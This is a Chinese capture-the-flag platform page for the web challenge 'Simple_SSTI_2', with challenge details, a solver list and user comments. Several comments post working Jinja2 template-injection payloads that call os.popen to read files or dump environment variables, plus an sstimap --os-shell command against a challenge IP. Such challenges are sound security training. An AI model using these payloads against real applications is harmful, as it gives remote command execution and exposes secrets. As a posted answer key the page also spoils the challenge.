Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16095
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
那天晚风和她 攻破了该题 2天前
huangyujie 攻破了该题 2天前
yamojito 攻破了该题 3天前
lin666 攻破了该题 3天前
Vergil 攻破了该题 5天前
乐乐a 攻破了该题 5天前
psych1 攻破了该题 5天前
eight8 攻破了该题 5天前
stragon 攻破了该题 6天前
liutong27 攻破了该题 6天前
tiger007 攻破了该题 6天前
Leext 攻破了该题 6天前
storysnail 攻破了该题 7天前
zengzhijing 攻破了该题 7天前
ffggfhge 攻破了该题 7天前
孙燕姿圈外男友 攻破了该题 8天前
huasir 攻破了该题 8天前
xiayanting 攻破了该题 9天前
xrq01 攻破了该题 9天前
评论
liutong27 6天前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 3月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 5月前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 5月前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 10月前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 1年前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 1年前
举报
因为没有import os,os是未定义的
q1152874733 1年前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}
Royic 1年前
举报
/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}